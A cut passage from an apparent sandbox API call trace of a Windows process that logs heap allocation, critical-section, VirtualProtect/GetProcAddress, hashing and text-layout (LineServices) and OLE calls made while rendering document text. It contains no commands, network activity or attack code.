(CriticalSection=0x8c2758) returned 1 [0160.585] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.585] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.585] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.585] LsGetRubyLsimethods () returned 0x0 [0160.586] LsGetTatenakayokoLsimethods () returned 0x0 [0160.586] LsGetHihLsimethods () returned 0x0 [0160.586] LsGetWarichuLsimethods () returned 0x0 [0160.586] LsGetReverseLsimethods () returned 0x0 [0160.586] LsCreateContext () returned 0x0 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x6ddfb8 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d7f48 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6d0018 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d81e8 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x6dd2b8 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5be0 [0160.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5cf8 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x64cf68 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c50 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97c8 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9bd8 [0160.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x6d9f50 [0160.587] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.587] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.587] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.588] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x6de630 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67b048 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdbc0 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6dd5a8 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6da358 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x6da470 [0160.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b8c0 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9ef85d8 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6ce488 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x9ef8770 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68cd60 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x9ef8868 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b990 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9ef8a08 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdcd8 [0160.589] LsSetModWidthPairs () returned 0x0 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f7e90 [0160.589] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcae0 [0160.589] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.590] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.590] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.590] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.590] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.590] LsSetBreaking () returned 0x0 [0160.590] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x9ef8ba0 [0160.590] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6d9648 [0160.590] LsSetDoc () returned 0x0 [0160.590] IOleInPlaceFrame:RemoveMenus (This=0xcfae50, hmenuShared=0x6de164) returned 0x0 [0160.590] IOleInPlaceFrame:RemoveMenus (This=0xcfae60, hmenuShared=0x6de164) returned 0x0 [0160.590] IOleInPlaceFrame:RemoveMenus (This=0xcfae70, hmenuShared=0x6de164) returned 0x0 [0160.590] IOleInPlaceFrame:RemoveMenus (This=0xcfae80, hmenuShared=0x6de164) returned 0x0 [0160.590] LsCreateLine () returned 0x0 [0160.591] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.591] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.591] LsdnFinishRegular () returned 0x0 [0160.591] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.595] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.596] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.596] LsQueryLineDup () returned 0x0 [0160.596] IOleInPlaceFrame:SetMenu (This=0xd0f220, hmenuShared=0xe10, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0160.596] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.597] GetProcAddress (hModule=0x65d00000, lpProcName=0x49) returned 0x65d189e0 [0160.597] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1977d4 | out: lpflOldProtect=0x1977d4*=0x4) returned 1 [0160.598] LsGetMinDurBreaks () returned 0x0 [0160.598] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.599] GetProcAddress (hModule=0x65d00000, lpProcName=0x1b) returned 0x65d11cc0 [0160.599] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197678 | out: lpflOldProtect=0x197678*=0x4) returned 1 [0160.599] LsdnQueryObjDimRange () returned 0x0 [0160.599] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.600] GetProcAddress (hModule=0x65d00000, lpProcName=0x48) returned 0x65d1a440 [0160.600] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1977d4 | out: lpflOldProtect=0x1977d4*=0x4) returned 1 [0160.601] LsEnumLine () returned 0x0 [0160.601] LsDestroyLine () returned 0x0 [0160.601] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae50) returned 0x0 [0160.601] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.602] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.602] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.602] LsSetDoc () returned 0x0 [0160.602] LsCreateLine () returned 0x0 [0160.602] LsQueryLineDup () returned 0x0 [0160.602] LsGetMinDurBreaks () returned 0x0 [0160.604] LsEnumLine () returned 0x0 [0160.604] LsDestroyLine () returned 0x0 [0160.604] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0160.604] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x198210, cbHash=0x2 | out: pbHash=0x198210) returned 0x0 [0160.604] HashData (in: pbData=0x19820c, cbData=0x4, pbHash=0x198218, cbHash=0x2 | out: pbHash=0x198218) returned 0x0 [0160.604] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x198214, cbHash=0x2 | out: pbHash=0x198214) returned 0x0 [0160.604] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d96c0 [0160.605] HashData (in: pbData=0x6d96c0, cbData=0x1, pbHash=0x198210, cbHash=0x2 | out: pbHash=0x198210) returned 0x0 [0160.605] HashData (in: pbData=0x19820c, cbData=0x4, pbHash=0x198218, cbHash=0x2 | out: pbHash=0x198218) returned 0x0 [0160.605] HashData (in: pbData=0x6d96c4, cbData=0xc, pbHash=0x198214, cbHash=0x2 | out: pbHash=0x198214) returned 0x0 [0160.605] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96c0 | out: hHeap=0x5e0000) returned 1 [0160.605] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.614] MulDiv (nNumber=100, nNumerator=28100, nDenominator=100) returned 28100 [0160.614] MulDiv (nNumber=100, nNumerator=0, nDenominator=28100) returned 0 [0160.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d96c0 [0160.615] HashData (in: pbData=0x6d96c0, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0160.615] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0160.615] HashData (in: pbData=0x6d96c4, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0160.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96c0 | out: hHeap=0x5e0000) returned 1 [0160.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d96c0 [0160.615] HashData (in: pbData=0x6d96c0, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0160.615] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0160.615] HashData (in: pbData=0x6d96c4, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0160.615] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96c0 | out: hHeap=0x5e0000) returned 1 [0160.615] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.616] LsSetDoc () returned 0x0 [0160.616] LsCreateLine () returned 0x0 [0160.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.616] LsdnFinishRegular () returned 0x0 [0160.617] LsQueryLineDup () returned 0x0 [0160.617] IOleInPlaceFrame:SetMenu (This=0xd0f260, hmenuShared=0xe10, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0160.618] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.618] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.618] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.618] LsDestroyLine () returned 0x0 [0160.618] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae50) returned 0x0 [0160.619] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0160.619] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0160.619] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0160.619] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0160.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0160.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9588 [0160.619] HashData (in: pbData=0x6d9588, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0160.619] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0160.619] HashData (in: pbData=0x6d958c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0160.619] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9588 | out: hHeap=0x5e0000) returned 1 [0160.620] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.620] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.626] LsdnFinishRegular () returned 0x0 [0160.626] LsQueryLineDup () returned 0x0 [0160.626] IOleInPlaceFrame:SetMenu (This=0xd0f200, hmenuShared=0x7148, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0160.626] LsQueryLineCpPpoint () returned 0x0 [0160.627] LsDestroyLine () returned 0x0 [0160.627] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0160.627] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.627] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.627] LsSetDoc () returned 0x0 [0160.627] LsCreateLine () returned 0x0 [0160.627] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.628] LsSetDoc () returned 0x0 [0160.628] LsCreateLine () returned 0x0 [0160.713] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.713] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.716] GetProcAddress (hModule=0x65d00000, lpProcName=0x6) returned 0x65d03b90 [0160.717] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197308 | out: lpflOldProtect=0x197308*=0x4) returned 1 [0160.873] LsCreateSubline () returned 0x0 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63ee50 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d99d0 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9930 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2a70 [0160.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0160.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98e0 [0160.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98b8 [0160.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97f0 [0160.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9a48 [0160.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6da6f0 [0160.874] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.875] GetProcAddress (hModule=0x65d00000, lpProcName=0x7) returned 0x65d043b0 [0160.875] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1972f8 | out: lpflOldProtect=0x1972f8*=0x4) returned 1 [0160.875] LsFetchAppendToCurrentSubline () returned 0x0 [0160.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.876] memcpy_s (in: _Destination=0xcfaea0, _DestinationSize=0x10, _Source=0x196fc8, _SourceSize=0x10 | out: _Destination=0xcfaea0) returned 0x0 [0160.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.877] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.877] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.878] GetProcAddress (hModule=0x65d00000, lpProcName=0xa) returned 0x65d04ff0 [0160.878] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197314 | out: lpflOldProtect=0x197314*=0x4) returned 1 [0160.878] LsFinishCurrentSubline () returned 0x0 [0160.878] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.879] GetProcAddress (hModule=0x65d00000, lpProcName=0x35) returned 0x65d02f60 [0160.885] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197310 | out: lpflOldProtect=0x197310*=0x4) returned 1 [0160.885] LssbGetObjDimSubline () returned 0x0 [0160.885] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.886] GetProcAddress (hModule=0x65d00000, lpProcName=0x27) returned 0x65d10bc0 [0160.886] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1972f8 | out: lpflOldProtect=0x1972f8*=0x4) returned 1 [0160.887] LsdnSubmitSublines () returned 0x0 [0160.887] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9b38 [0160.887] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6c20 [0160.887] LsdnFinishRegular () returned 0x0 [0160.887] LsQueryLineDup () returned 0x0 [0160.887] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.888] GetProcAddress (hModule=0x65d00000, lpProcName=0x37) returned 0x65d05900 [0160.888] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1975e0 | out: lpflOldProtect=0x1975e0*=0x4) returned 1 [0160.889] LssbFDonePresSubline () returned 0x0 [0160.889] LsGetMinDurBreaks () returned 0x0 [0160.889] LsdnQueryObjDimRange () returned 0x0 [0160.889] LsEnumLine () returned 0x0 [0160.889] LsDestroyLine () returned 0x0 [0160.889] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0160.889] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b38 | out: hHeap=0x5e0000) returned 1 [0160.889] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.890] GetProcAddress (hModule=0x65d00000, lpProcName=0x10) returned 0x65d02910 [0160.890] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x197890 | out: lpflOldProtect=0x197890*=0x4) returned 1 [0160.891] LsDestroySubline () returned 0x0 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99d0 | out: hHeap=0x5e0000) returned 1 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9930 | out: hHeap=0x5e0000) returned 1 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2a70 | out: hHeap=0x5e0000) returned 1 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98b8 | out: hHeap=0x5e0000) returned 1 [0160.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98e0 | out: hHeap=0x5e0000) returned 1 [0160.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97f0 | out: hHeap=0x5e0000) returned 1 [0160.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9a48 | out: hHeap=0x5e0000) returned 1 [0160.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ee50 | out: hHeap=0x5e0000) returned 1 [0160.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x5e0000) returned 1 [0160.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0160.892] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae60) returned 0x0 [0160.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.893] LsSetDoc () returned 0x0 [0160.893] LsCreateLine () returned 0x0 [0160.894] LsQueryLineDup () returned 0x0 [0160.894] LsGetMinDurBreaks () returned 0x0 [0160.894] LsEnumLine () returned 0x0 [0160.894] LsDestroyLine () returned 0x0 [0160.894] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.894] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.895] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.895] LsSetDoc () returned 0x0 [0160.895] LsCreateLine () returned 0x0 [0160.895] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.895] LsCreateSubline () returned 0x0 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63ee50 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9a98 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d99f8 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2a70 [0160.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0160.896] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b38 [0160.896] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9a20 [0160.896] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b88 [0160.896] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b60 [0160.896] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa8) returned 0x6da6f0 [0160.896] LsFetchAppendToCurrentSubline () returned 0x0 [0160.896] LsFinishCurrentSubline () returned 0x0 [0160.896] LssbGetObjDimSubline () returned 0x0 [0160.896] LsdnSubmitSublines () returned 0x0 [0160.897] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d99a8 [0160.897] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6d60 [0160.897] LsdnFinishRegular () returned 0x0 [0160.897] LsQueryLineDup () returned 0x0 [0160.897] LssbFDonePresSubline () returned 0x0 [0160.897] LsGetMinDurBreaks () returned 0x0 [0160.897] LsdnQueryObjDimRange () returned 0x0 [0160.897] LsEnumLine () returned 0x0 [0160.899] LsDestroyLine () returned 0x0 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99a8 | out: hHeap=0x5e0000) returned 1 [0160.899] LsDestroySubline () returned 0x0 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9a98 | out: hHeap=0x5e0000) returned 1 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99f8 | out: hHeap=0x5e0000) returned 1 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2a70 | out: hHeap=0x5e0000) returned 1 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0160.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9a20 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b38 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b88 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b60 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ee50 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x5e0000) returned 1 [0160.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0160.900] IOleInPlaceSite:CanInPlaceActivate (This=0xcfae60) returned 0x0 [0160.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.901] LsSetDoc () returned 0x0 [0160.901] LsCreateLine () returned 0x0 [0160.901] LsQueryLineDup () returned 0x0 [0160.901] LsGetMinDurBreaks () returned 0x0 [0160.901] LsEnumLine () returned 0x0 [0160.901] LsDestroyLine () returned 0x0 [0160.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.901] LsSetDoc () returned 0x0 [0160.901] LsCreateLine () returned 0x0 [0160.902] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.902] LsCreateSubline () returned 0x0 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x6928b0 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x63ee50 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c00 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c28 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2d10 [0160.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db358 [0160.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9778 [0160.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ae8 [0160.903] RtlAllocateHeap 